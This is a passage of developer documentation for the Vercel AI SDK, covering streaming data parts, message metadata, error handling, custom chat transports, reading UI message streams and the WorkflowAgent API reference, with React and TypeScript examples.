When you write to a data part with the same ID, the client automatically reconciles and updates that part. This enables powerful dynamic experiences like:
- Collaborative artifacts - Update code, documents, or designs in real-time
- Progressive data loading - Show loading states that transform into final results
- Live status updates - Update progress bars, counters, or status indicators
- Interactive components - Build UI elements that evolve based on user interaction
The reconciliation happens automatically - simply use the same id when writing to the stream.
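For example, the weather part from the example above can be written once in a loading state and later overwritten by id (a condensed sketch of the server code shown earlier):
// First write creates the part in a loading state
writer.write({
  type: 'data-weather',
  id: 'weather-1',
  data: { city: 'San Francisco', status: 'loading' },
});
// A later write with the same id replaces the part in place on the client
writer.write({
  type: 'data-weather',
  id: 'weather-1',
  data: { city: 'San Francisco', weather: 'sunny', status: 'success' },
});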
Processing Data on the Client
Using the onData Callback
The onData callback is essential for handling streaming data, especially transient parts:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import type { MyUIMessage } from '@/ai/types';
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({ api: '/api/chat' }),
onData: dataPart => {
// Handle all data parts as they arrive (including transient parts)
console.log('Received data part:', dataPart);
// Handle different data part types
if (dataPart.type === 'data-weather') {
console.log('Weather update:', dataPart.data);
}
// Handle transient notifications (ONLY available here, not in message.parts)
if (dataPart.type === 'data-notification') {
showToast(dataPart.data.message, dataPart.data.level);
}
},
});
Important: Transient data parts are only available through the onData callback. They will not appear in the message.parts array since they're not added to message history.
Rendering Persistent Data Parts
You can filter and render data parts from the message parts array:
const result = (
<>
{messages?.map(message => (
<div key={message.id}>
{/* Render weather data parts */}
{message.parts
.filter(part => part.type === 'data-weather')
.map((part, index) => (
<div key={index} className="weather-widget">
{part.data.status === 'loading' ? (
<>Getting weather for {part.data.city}...</>
) : (
<>
Weather in {part.data.city}: {part.data.weather}
</>
)}
</div>
))}
{/* Render text content */}
{message.parts
.filter(part => part.type === 'text')
.map((part, index) => (
<div key={index}>{part.text}</div>
))}
{/* Render sources */}
{message.parts
.filter(part => part.type === 'source')
.map((part, index) => (
<div key={index} className="source">
Source: <a href={part.url}>{part.title}</a>
</div>
))}
</div>
))}
</>
);
Complete Example
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
import type { MyUIMessage } from '@/ai/types';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({ api: '/api/chat' }),
onData: dataPart => {
// Handle transient notifications
if (dataPart.type === 'data-notification') {
console.log('Notification:', dataPart.data.message);
}
},
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<>
{messages?.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{/* Render weather data */}
{message.parts
.filter(part => part.type === 'data-weather')
.map((part, index) => (
<span key={index} className="weather-update">
{part.data.status === 'loading' ? (
<>Getting weather for {part.data.city}...</>
) : (
<>
Weather in {part.data.city}: {part.data.weather}
</>
)}
</span>
))}
{/* Render text content */}
{message.parts
.filter(part => part.type === 'text')
.map((part, index) => (
<div key={index}>{part.text}</div>
))}
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Ask about the weather..."
/>
<button type="submit">Send</button>
</form>
</>
);
}
Use Cases
- RAG Applications - Stream sources and retrieved documents
- Real-time Status - Show loading states and progress updates
- Collaborative Tools - Stream live updates to shared artifacts
- Analytics - Send usage data without cluttering message history
- Notifications - Display temporary alerts and status messages
Message Metadata vs Data Parts
Both message metadata and data parts allow you to send additional information alongside messages, but they serve different purposes:
Message Metadata
Message metadata is best for message-level information that describes the message as a whole:
- Attached at the message level via `message.metadata`
- Sent using the `messageMetadata` callback in `toUIMessageStreamResponse`
- Ideal for: timestamps, model info, token usage, user context
- Type-safe with custom metadata types
// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
messageMetadata: ({ part }) => {
if (part.type === 'finish') {
return {
model: part.response.modelId,
totalTokens: part.totalUsage.totalTokens,
createdAt: Date.now(),
};
}
},
});
Data Parts
Data parts are best for streaming dynamic arbitrary data:
- Added to the message parts array via `message.parts`
- Streamed using `createUIMessageStream` and `writer.write()`
- Can be reconciled/updated using the same ID
- Support transient parts that don't persist
- Ideal for: dynamic content, loading states, interactive components
// Server: Stream data as part of message content
writer.write({
type: 'data-weather',
id: 'weather-1',
data: { city: 'San Francisco', status: 'loading' },
});
For more details on message metadata, see the Message Metadata documentation.
title: Error Handling description: Learn how to handle errors in the AI SDK UI
Error Handling and Warnings
Warnings
The AI SDK shows warnings when something might not work as expected. These warnings help you fix problems before they cause errors.
When Warnings Appear
Warnings are shown in the browser console when:
- Unsupported features: You use a feature or setting that is not supported by the AI model (e.g., certain options or parameters).
- Compatibility warnings: A feature is used in a compatibility mode, which might work differently or less optimally than intended.
- Other warnings: The AI model reports another type of issue, such as general problems or advisory messages.
Warning Messages
All warnings start with "AI SDK Warning:" so you can easily find them. For example:
AI SDK Warning: The feature "temperature" is not supported by this model
Turning Off Warnings
By default, warnings are shown in the console. You can control this behavior:
Turn Off All Warnings
Set a global variable to turn off warnings completely:
globalThis.AI_SDK_LOG_WARNINGS = false;
Custom Warning Handler
You can also provide your own function to handle warnings. It receives provider id, model id, and a list of warnings.
globalThis.AI_SDK_LOG_WARNINGS = ({ warnings, provider, model }) => {
// Handle warnings your own way
};
Error Handling
Error Helper Object
Each AI SDK UI hook also returns an error object that you can use to render the error in your UI. You can use the error object to show an error message, disable the submit button, or show a retry button.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage, error, regenerate } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts
.filter(part => part.type === 'text')
.map(part => part.text)
.join('')}
</div>
))}
{error && (
<>
<div>An error occurred.</div>
<button type="button" onClick={() => regenerate()}>
Retry
</button>
</>
)}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={error != null}
/>
</form>
</div>
);
}
Alternative: replace last message
Alternatively you can write a custom submit handler that replaces the last message when an error is present.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { sendMessage, error, messages, setMessages } = useChat();
function customSubmit(event: React.FormEvent<HTMLFormElement>) {
event.preventDefault();
if (error != null) {
setMessages(messages.slice(0, -1)); // remove last message
}
sendMessage({ text: input });
setInput('');
}
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts
.filter(part => part.type === 'text')
.map(part => part.text)
.join('')}
</div>
))}
{error && <div>An error occurred.</div>}
<form onSubmit={customSubmit}>
<input value={input} onChange={e => setInput(e.target.value)} />
</form>
</div>
);
}
Error Handling Callback
Errors can be processed by passing an onError callback function as an option to the useChat or useCompletion hooks.
The callback function receives an error object as an argument.
import { useChat } from '@ai-sdk/react';
export default function Page() {
const {
/* ... */
} = useChat({
// handle error:
onError: error => {
console.error(error);
},
});
}
Injecting Errors for Testing
You might want to create errors for testing. You can easily do so by throwing an error in your route handler:
export async function POST(req: Request) {
throw new Error('This is a test error');
}
title: Transport description: Learn how to use custom transports with useChat.
Transport
The useChat transport system provides fine-grained control over how messages are sent to your API endpoints and how responses are processed. This is particularly useful for alternative communication protocols like WebSockets, custom authentication patterns, or specialized backend integrations.
Default Transport
By default, useChat uses HTTP POST requests to send messages to /api/chat:
import { useChat } from '@ai-sdk/react';
// Uses default HTTP transport
const { messages, sendMessage } = useChat();
This is equivalent to:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
Custom Transport Configuration
Configure the default transport with custom options:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/custom-chat',
headers: {
Authorization: 'Bearer your-token',
'X-API-Version': '2024-01',
},
credentials: 'include',
}),
});
Dynamic Configuration
You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
headers: () => ({
Authorization: `Bearer ${getAuthToken()}`,
'X-User-ID': getCurrentUserId(),
}),
body: () => ({
sessionId: getCurrentSessionId(),
preferences: getUserPreferences(),
}),
credentials: () => 'include',
}),
});
Request Transformation
Transform requests before sending to your API:
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
return {
headers: {
'X-Session-ID': id,
},
body: {
messages: messages.slice(-10), // Only send last 10 messages
trigger,
messageId,
},
};
},
}),
});
Direct Agent Transport
For scenarios where you want to communicate directly with an Agent without going through HTTP, you can use DirectChatTransport. This transport invokes the agent's stream() method directly in-process.
This is useful for:
- Server-side rendering: Run the agent on the server without an API endpoint
- Testing: Test chat functionality without network requests
- Single-process applications: Desktop or CLI apps where client and agent run together
import { useChat } from '@ai-sdk/react';
import { DirectChatTransport, ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'You are a helpful assistant.',
tools: {
weather: weatherTool,
},
});
const { messages, sendMessage } = useChat({
transport: new DirectChatTransport({ agent }),
});
How It Works
Unlike DefaultChatTransport which sends HTTP requests:
- `DirectChatTransport` validates incoming UI messages
- Converts them to model messages using `convertToModelMessages`
- Calls the agent's `stream()` method directly
- Returns the result as a UI message stream via `toUIMessageStream()`
Configuration Options
You can pass additional options to customize the stream output:
const transport = new DirectChatTransport({
agent,
// Pass options to the agent
options: { customOption: 'value' },
// Configure what's sent to the client
sendReasoning: true,
sendSources: true,
});
For complete API details, see the DirectChatTransport reference.
Workflow Transport
For chat apps built on Vercel Workflows, WorkflowChatTransport from @ai-sdk/workflow provides automatic stream reconnection. It handles the common scenario where a workflow function times out mid-stream — the transport detects the missing finish event and reconnects to resume from where it left off.
import { useChat } from '@ai-sdk/react';
import { WorkflowChatTransport } from '@ai-sdk/workflow';
import { useMemo } from 'react';
export default function Chat() {
const transport = useMemo(
() =>
new WorkflowChatTransport({
api: '/api/chat',
maxConsecutiveErrors: 5,
initialStartIndex: -50, // On page refresh, fetch last 50 chunks
onChatEnd: ({ chatId, chunkIndex }) => {
console.log(`Chat complete: ${chunkIndex} chunks`);
},
}),
[],
);
const { messages, sendMessage } = useChat({ transport });
// ... render chat UI
}
Key features:
- Automatic reconnection: Detects interrupted streams (no `finish` event) and reconnects via GET to `{api}/{runId}/stream`
- Page refresh recovery: `initialStartIndex` with negative values (e.g., `-50`) fetches only the tail of the stream instead of replaying everything
- Configurable retries: `maxConsecutiveErrors` controls how many consecutive reconnection failures to tolerate
- Lifecycle callbacks: `onChatSendMessage` and `onChatEnd` for tracking chat state
For the full API reference, see WorkflowChatTransport. For server-side endpoint setup, see the WorkflowAgent guide.
Building Custom Transports
To understand how to build your own transport, refer to the source code of the default implementation:
- DefaultChatTransport - The complete default HTTP transport implementation
- HttpChatTransport - Base HTTP transport with request handling
- ChatTransport Interface - The transport interface you need to implement
These implementations show you exactly how to:
- Handle the `sendMessages` method
- Process UI message streams
- Transform requests and responses
- Handle errors and connection management
The transport system gives you complete control over how your chat application communicates, enabling integration with any backend protocol or service.
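To get a feel for the shape, here is a minimal skeleton, assuming only the two methods described above (the option types come from the ChatTransport interface; the WebSocket angle is illustrative):
import type { ChatTransport, UIMessage, UIMessageChunk } from 'ai';
class MyCustomTransport implements ChatTransport<UIMessage> {
  async sendMessages(
    options: Parameters<ChatTransport<UIMessage>['sendMessages']>[0],
  ): Promise<ReadableStream<UIMessageChunk>> {
    // Send options.messages over your protocol (WebSocket, IPC, ...) and
    // adapt incoming events into UIMessageChunk objects.
    return new ReadableStream<UIMessageChunk>({
      start(controller) {
        // ...enqueue chunks as they arrive, then:
        controller.close();
      },
    });
  }
  async reconnectToStream(
    options: Parameters<ChatTransport<UIMessage>['reconnectToStream']>[0],
  ): Promise<ReadableStream<UIMessageChunk> | null> {
    // Return null when there is no active stream to resume.
    return null;
  }
}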
title: Reading UIMessage Streams description: Learn how to read UIMessage streams.
Reading UI Message Streams
UIMessage streams are useful outside of traditional chat use cases. You can consume them for terminal UIs, custom stream processing on the client, or React Server Components (RSC).
The readUIMessageStream helper transforms a stream of UIMessageChunk objects into an AsyncIterableStream of UIMessage objects, allowing you to process messages as they're being constructed.
Basic Usage
import { readUIMessageStream, streamText } from 'ai';
__PROVIDER_IMPORT__;
async function main() {
const result = streamText({
model: __MODEL__,
prompt: 'Write a short story about a robot.',
});
for await (const uiMessage of readUIMessageStream({
stream: result.toUIMessageStream(),
})) {
console.log('Current message state:', uiMessage);
}
}
Tool Calls Integration
Handle streaming responses that include tool calls:
import { readUIMessageStream, streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function handleToolCalls() {
const result = streamText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
prompt: 'What is the weather in Tokyo?',
});
for await (const uiMessage of readUIMessageStream({
stream: result.toUIMessageStream(),
})) {
// Handle different part types
uiMessage.parts.forEach(part => {
switch (part.type) {
case 'text':
console.log('Text:', part.text);
break;
case 'tool-call':
console.log('Tool called:', part.toolName, 'with args:', part.args);
break;
case 'tool-result':
console.log('Tool result:', part.result);
break;
}
});
}
}
Resuming Conversations
Resume streaming from a previous message state:
import { readUIMessageStream, streamText, type UIMessage } from 'ai';
__PROVIDER_IMPORT__;
async function resumeConversation(lastMessage: UIMessage) {
const result = streamText({
model: __MODEL__,
messages: [
{ role: 'user', content: 'Continue our previous conversation.' },
],
});
// Resume from the last message
for await (const uiMessage of readUIMessageStream({
stream: result.toUIMessageStream(),
message: lastMessage, // Resume from this message
})) {
console.log('Resumed message:', uiMessage);
}
}
title: Message Metadata description: Learn how to attach and use metadata with messages in AI SDK UI
Message Metadata
Message metadata allows you to attach custom information to messages at the message level. This is useful for tracking timestamps, model information, token usage, user context, and other message-level data.
Overview
Message metadata differs from data parts in that it's attached at the message level rather than being part of the message content. While data parts are ideal for dynamic content that forms part of the message, metadata is perfect for information about the message itself.
Getting Started
Here's a simple example of using message metadata to track timestamps and model information:
Defining Metadata Types
First, define your metadata type for type safety:
import { UIMessage } from 'ai';
import { z } from 'zod';
// Define your metadata schema
export const messageMetadataSchema = z.object({
createdAt: z.number().optional(),
model: z.string().optional(),
totalTokens: z.number().optional(),
});
export type MessageMetadata = z.infer<typeof messageMetadataSchema>;
// Create a typed UIMessage
export type MyUIMessage = UIMessage<MessageMetadata>;
Sending Metadata from the Server
Use the messageMetadata callback in toUIMessageStreamResponse to send metadata at different streaming stages:
import { convertToModelMessages, streamText } from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/types';
export async function POST(req: Request) {
const { messages }: { messages: MyUIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages, // pass this in for type-safe return objects
messageMetadata: ({ part }) => {
// Send metadata when streaming starts
if (part.type === 'start') {
return {
createdAt: Date.now(),
model: 'your-model-id',
};
}
// Send additional metadata when streaming completes
if (part.type === 'finish') {
return {
totalTokens: part.totalUsage.totalTokens,
};
}
},
});
}
Accessing Metadata on the Client
Access metadata through the message.metadata property:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import type { MyUIMessage } from '@/types';
export default function Chat() {
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.metadata?.createdAt && (
<span className="text-sm text-gray-500">
{new Date(message.metadata.createdAt).toLocaleTimeString()}
</span>
)}
</div>
{/* Render message content */}
{message.parts.map((part, index) =>
part.type === 'text' ? <div key={index}>{part.text}</div> : null,
)}
{/* Display additional metadata */}
{message.metadata?.totalTokens && (
<div className="text-xs text-gray-400">
{message.metadata.totalTokens} tokens
</div>
)}
</div>
))}
</div>
);
}
Common Use Cases
Message metadata is ideal for:
- Timestamps: When messages were created or completed
- Model Information: Which AI model was used
- Token Usage: Track costs and usage limits
- User Context: User IDs, session information
- Performance Metrics: Generation time, time to first token
- Quality Indicators: Finish reason, confidence scores
See Also
- Chatbot Guide - Message metadata in the context of building chatbots
- Streaming Data - Comparison with data parts
- UIMessage Reference - Complete UIMessage type reference
title: WorkflowAgent description: API Reference for the WorkflowAgent class.
WorkflowAgent
Creates a durable, resumable AI agent for use inside Vercel Workflows. WorkflowAgent handles the agent loop, tool schema serialization across workflow step boundaries, and built-in tool approval flows.
Unlike ToolLoopAgent from the ai package, WorkflowAgent is designed to survive process restarts, pause for human approval, and integrate with the Workflow DevKit's step mechanism.
import { WorkflowAgent } from '@ai-sdk/workflow';
import { tool } from 'ai';
import { z } from 'zod';
const agent = new WorkflowAgent({
model: 'anthropic/claude-sonnet-4-6',
instructions: 'You are a helpful assistant.',
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string(),
}),
execute: async ({ location }) => ({
location,
temperature: 72,
}),
}),
},
});
const result = await agent.stream({
messages: [{ role: 'user', content: [{ type: 'text', text: 'What is the weather in NYC?' }] }],
});
console.log(result.messages);
To see WorkflowAgent in action, check out these examples.
Import
<Snippet text={`import { WorkflowAgent } from "@ai-sdk/workflow"`} prompt={false} />
Constructor
Parameters
<PropertiesTable
content={[
{
name: 'id',
type: 'string',
isOptional: true,
description: 'The id of the agent.',
},
{
name: 'model',
type: 'LanguageModel',
isRequired: true,
description:
"The language model to use. A string compatible with the Vercel AI Gateway (e.g., 'anthropic/claude-sonnet-4-6') or a provider instance (e.g., openai('gpt-4o')).",
},
{
name: 'instructions',
type: 'string | SystemModelMessage | SystemModelMessage[]',
isOptional: true,
description:
'Instructions for the agent, used as the system prompt. Supports provider-specific options (e.g., caching) when using the SystemModelMessage form.',
},
{
name: 'tools',
type: 'Record<string, Tool>',
isOptional: true,
description:
'A set of tools the agent can call. Keys are tool names. Tools are serialized to JSON Schema across workflow step boundaries and validated with Ajv at runtime.',
},
{
name: 'toolChoice',
type: 'ToolChoice',
isOptional: true,
description:
"Tool call selection strategy. Options: 'auto' | 'none' | 'required' | { type: 'tool', toolName: string }. Default: 'auto'.",
},
{
name: 'stopWhen',
type: 'StopCondition | StopCondition[]',
isOptional: true,
description: 'Default stop condition for the agent loop. Per-stream values override this default. Use isLoopFinished() to let the agent run until all tool calls have completed, but beware of potential runaway loops. See https://ai-sdk.dev/v7/docs/reference/ai-sdk-core/loop-finished#isloopfinished.',
},
{
name: 'activeTools',
type: 'Array',
isOptional: true,
description: 'Default set of active tools. Limits which tools the model can call. Per-stream values override this default.',
},
{
name: 'output',
type: 'OutputSpecification',
isOptional: true,
description: 'Default structured output specification. Per-stream values override this default.',
},
{
name: 'experimental_repairToolCall',
type: 'ToolCallRepairFunction',
isOptional: true,
description: 'Default function to repair tool calls that fail to parse. Per-stream values override this default.',
},
{
name: 'experimental_download',
type: 'DownloadFunction',
isOptional: true,
description: 'Default custom download function for URLs. Per-stream values override this default.',
},
{
name: 'prepareStep',
type: 'PrepareStepCallback',
isOptional: true,
description:
'Callback called before each step in the agent loop. Use it to modify settings, manage context, or inject messages dynamically. Receives step number, previous steps, messages, and context.',
},
{
name: 'prepareCall',
type: 'PrepareCallCallback',
isOptional: true,
description:
'Callback called once before the agent loop starts. Use it to transform model, instructions, tools configuration, or other settings based on runtime context. Cannot override tools (bound at construction for type safety).',
},
{
name: 'experimental_context',
type: 'unknown',
isOptional: true,
description:
'Default context passed into tool execution and lifecycle callbacks for every stream call. Per-call values override this default. Experimental (can break in patch releases).',
},
{
name: 'telemetry',
type: 'TelemetryOptions',
isOptional: true,
description:
'Telemetry configuration with options for enabling/disabling telemetry, setting a function ID, and recording inputs/outputs.',
},
{
name: 'experimental_onStart',
type: 'WorkflowAgentOnStartCallback',
isOptional: true,
description:
'Callback called when the agent starts streaming, before any LLM calls. Receives the model and messages. If also specified in stream(), both callbacks fire (constructor first). Experimental (can break in patch releases).',
properties: [
{
type: 'OnStartEvent',
parameters: [
{
name: 'model',
type: 'LanguageModel',
description: 'The model being used for the generation.',
},
{
name: 'messages',
type: 'Array',
description: 'The messages being sent to the model.',
},
],
},
],
},
{
name: 'experimental_onStepStart',
type: 'WorkflowAgentOnStepStartCallback',
isOptional: true,
description:
'Callback called before each step (LLM call) begins. Receives step number, model, and messages. If also specified in stream(), both callbacks fire (constructor first). Experimental (can break in patch releases).',
properties: [
{
type: 'OnStepStartEvent',
parameters: [
{
name: 'stepNumber',
type: 'number',
description: 'Zero-based index of the current step.',
},
{
name: 'model',
type: 'LanguageModel',
description: 'The model being used for this step.',
},
{
name: 'messages',
type: 'Array',
description: 'The messages that will be sent to the model for this step.',
},
{
name: 'steps',
type: 'ReadonlyArray',
description: 'Results from all previously finished steps.',
},
],
},
],
},
{
name: 'experimental_onToolExecutionStart',
type: 'WorkflowAgentOnToolExecutionStartCallback',
isOptional: true,
description:
"Callback called right before a tool's execute function runs. If also specified in stream(), both callbacks fire (constructor first). Experimental (can break in patch releases).",
properties: [
{
type: 'ToolExecutionStartEvent',
parameters: [
{
name: 'toolCall',
type: '{ type: "tool-call"; toolCallId: string; toolName: string; input: unknown }',
description: 'The tool call being executed.',
},
{
name: 'stepNumber',
type: 'number',
description: 'Zero-based index of the current step.',
},
],
},
],
},
{
name: 'experimental_onToolExecutionEnd',
type: 'WorkflowAgentOnToolExecutionEndCallback',
isOptional: true,
description:
"Callback called right after a tool's execute function completes or errors. Uses a discriminated union: check success to determine whether output or error is available. If also specified in stream(), both callbacks fire (constructor first). Experimental (can break in patch releases).",
properties: [
{
type: 'ToolExecutionEndEvent',
parameters: [
{
name: 'toolCall',
type: '{ type: "tool-call"; toolCallId: string; toolName: string; input: unknown }',
description: 'The tool call that was executed.',
},
{
name: 'stepNumber',
type: 'number',
description: 'Zero-based index of the current step.',
},
{
name: 'durationMs',
type: 'number',
description: 'Tool execution time in milliseconds.',
},
{
name: 'success',
type: 'boolean',
description: 'Whether the tool call succeeded. When true, output is available. When false, error is available.',
},
{
name: 'output',
type: 'unknown',
description: 'The tool result (only when success is true).',
},
{
name: 'error',
type: 'unknown',
description: 'The error that occurred (only when success is false).',
},
],
},
],
},
{
name: 'onStepFinish',
type: 'WorkflowAgentOnStepFinishCallback',
isOptional: true,
description:
'Callback invoked after each agent step completes. If also specified in stream(), both callbacks fire (constructor first).',
},
{
name: 'onFinish',
type: 'WorkflowAgentOnFinishCallback',
isOptional: true,
description:
'Callback called when all agent steps are finished and the response is complete. Receives steps, messages, text, finish reason, total usage, and context. If also specified in stream(), both callbacks fire (constructor first).',
},
{
name: 'maxOutputTokens',
type: 'number',
isOptional: true,
description: 'Maximum number of tokens the model is allowed to generate.',
},
{
name: 'temperature',
type: 'number',
isOptional: true,
description: 'Sampling temperature, controls randomness.',
},
{
name: 'topP',
type: 'number',
isOptional: true,
description: 'Top-p (nucleus) sampling parameter.',
},
{
name: 'topK',
type: 'number',
isOptional: true,
description: 'Top-k sampling parameter.',
},
{
name: 'presencePenalty',
type: 'number',
isOptional: true,
description: 'Presence penalty parameter.',
},
{
name: 'frequencyPenalty',
type: 'number',
isOptional: true,
description: 'Frequency penalty parameter.',
},
{
name: 'stopSequences',
type: 'string[]',
isOptional: true,
description: 'Custom token sequences which stop the model output.',
},
{
name: 'seed',
type: 'number',
isOptional: true,
description: 'Seed for deterministic generation (if supported).',
},
{
name: 'maxRetries',
type: 'number',
isOptional: true,
description: 'How many times to retry on failure. Default: 2.',
},
{
name: 'headers',
type: 'Record<string, string | undefined>',
isOptional: true,
description: 'Additional HTTP headers to be sent with the request. Only applicable for HTTP-based providers.',
},
{
name: 'providerOptions',
type: 'ProviderOptions',
isOptional: true,
description: 'Additional provider-specific configuration.',
},
]}
/>
Properties
<PropertiesTable content={[ { name: 'id', type: 'string | undefined', description: 'The id of the agent. Used for telemetry identification. Read-only.', }, { name: 'tools', type: 'Record<string, Tool>', description: 'The tool set configured for this agent. Read-only.', }, ]} />
Methods
stream()
Runs the agent loop, streaming responses and executing tool calls as needed. Returns a promise resolving to a WorkflowAgentStreamResult.
const result = await agent.stream({
messages: [{ role: 'user', content: [{ type: 'text', text: 'Hello' }] }],
});
<PropertiesTable
content={[
{
name: 'prompt',
type: 'string | Array',
description: 'A prompt string or a list of messages. You can either use prompt or messages but not both.',
},
{
name: 'messages',
type: 'Array',
description: 'The conversation messages to process. You can either use prompt or messages but not both.',
},
{
name: 'writable',
type: 'WritableStream',
isOptional: true,
description:
'A writable stream that receives raw model stream parts in real-time. Convert to UI message chunks at the response boundary using createModelCallToUIChunkTransform().',
},
{
name: 'system',
type: 'string',
isOptional: true,
description: 'Override the system prompt for this call.',
},
{
name: 'stopWhen',
type: 'StopCondition | StopCondition[]',
isOptional: true,
description: 'Condition(s) for ending the agent loop. Use isLoopFinished() to let the agent run until all tool calls have completed, but beware of potential runaway loops. See https://ai-sdk.dev/v7/docs/reference/ai-sdk-core/loop-finished#isloopfinished.',
},
{
name: 'toolChoice',
type: 'ToolChoice',
isOptional: true,
description: "Override the tool choice strategy for this call. Default: 'auto'.",
},
{
name: 'activeTools',
type: 'Array<string>',
isOptional: true,
description: 'Limits the subset of tools available for this call.',
},
{
name: 'output',
type: 'OutputSpecification',
isOptional: true,
description:
'Structured output specification. Use `Output.object({ schema })` for typed objects or `Output.text()` for text.',
},
{
name: 'timeout',
type: 'number',
isOptional: true,
description: 'Timeout in milliseconds. Creates an AbortSignal that aborts the operation after the given time.',
},
{
name: 'sendFinish',
type: 'boolean',
isOptional: true,
description: "Whether to send a 'finish' chunk to the writable stream when streaming completes. Default: true.",
},
{
name: 'preventClose',
type: 'boolean',
isOptional: true,
description: 'Whether to prevent the writable stream from being closed after streaming completes. Default: false.',
},
{
name: 'includeRawChunks',
type: 'boolean',
isOptional: true,
description: 'Include raw, unprocessed chunks from the provider in the stream. Default: false.',
},
{
name: 'experimental_repairToolCall',
type: 'ToolCallRepairFunction',
isOptional: true,
description: 'Callback to attempt automatic recovery when a tool call cannot be parsed.',
},
{
name: 'experimental_transform',
type: 'StreamTextTransform | Array<StreamTextTransform>',
isOptional: true,
description: 'Stream transformations applied in order. Must maintain the stream structure.',
},
{
name: 'experimental_download',
type: 'DownloadFunction',
isOptional: true,
description: 'Custom download function for fetching files/URLs.',
},
{
name: 'telemetry',
type: 'TelemetryOptions',
isOptional: true,
description: 'Per-call telemetry configuration.',
},
{
name: 'experimental_context',
type: 'unknown',
isOptional: true,
description: 'Per-call context override. Overrides the constructor default.',
},
{
name: 'prepareStep',
type: 'PrepareStepCallback',
isOptional: true,
description: 'Per-call prepareStep override.',
},
{
name: 'experimental_onStart',
type: 'WorkflowAgentOnStartCallback',
isOptional: true,
description:
'Per-call onStart callback. If also specified in the constructor, both fire (constructor first). Experimental.',
},
{
name: 'experimental_onStepStart',
type: 'WorkflowAgentOnStepStartCallback',
isOptional: true,
description:
'Per-call onStepStart callback. If also specified in the constructor, both fire (constructor first). Experimental.',
},
{
name: 'experimental_onToolExecutionStart',
type: 'WorkflowAgentOnToolExecutionStartCallback',
isOptional: true,
description:
'Per-call onToolExecutionStart callback. If also specified in the constructor, both fire (constructor first). Experimental.',
},
{
name: 'experimental_onToolExecutionEnd',
type: 'WorkflowAgentOnToolExecutionEndCallback',
isOptional: true,
description:
'Per-call onToolExecutionEnd callback. If also specified in the constructor, both fire (constructor first). Experimental.',
},
{
name: 'onStepFinish',
type: 'WorkflowAgentOnStepFinishCallback',
isOptional: true,
description:
'Per-call onStepFinish callback. If also specified in the constructor, both fire (constructor first).',
},
{
name: 'onFinish',
type: 'WorkflowAgentOnFinishCallback',
isOptional: true,
description:
'Per-call onFinish callback. If also specified in the constructor, both fire (constructor first).',
},
{
name: 'onError',
type: 'WorkflowAgentOnErrorCallback',
isOptional: true,
description: 'Callback invoked when an error occurs during streaming.',
},
{
name: 'onAbort',
type: 'WorkflowAgentOnAbortCallback',
isOptional: true,
description: 'Callback invoked when the operation is aborted. Receives all previously finished steps.',
},
]} />
Returns
Returns a Promise<WorkflowAgentStreamResult> with the following properties:
<PropertiesTable
content={[
{
name: 'messages',
type: 'Array',
description: 'The final messages including all tool calls and results.',
},
{
name: 'steps',
type: 'Array',
description: 'Details for all steps taken by the agent.',
},
{
name: 'toolCalls',
type: 'Array',
description: 'Tool calls from the last step, including unexecuted calls (e.g., tools requiring approval).',
},
{
name: 'toolResults',
type: 'Array',
description: 'Tool results from the last step. Only includes results for tools that were executed.',
},
{
name: 'output',
type: 'OUTPUT',
description: 'The structured output if an output specification was provided.',
},
]}
/>
Utilities
createModelCallToUIChunkTransform()
Creates a TransformStream that converts raw ModelCallStreamPart chunks (written by the agent to the writable stream) into UIMessageChunk objects suitable for client consumption.
import { createModelCallToUIChunkTransform } from '@ai-sdk/workflow';
return createUIMessageStreamResponse({
stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
});
toUIMessageChunk()
Converts a single ModelCallStreamPart to a UIMessageChunk. Returns undefined for parts that don't map to UI chunks.
import { toUIMessageChunk } from '@ai-sdk/workflow';
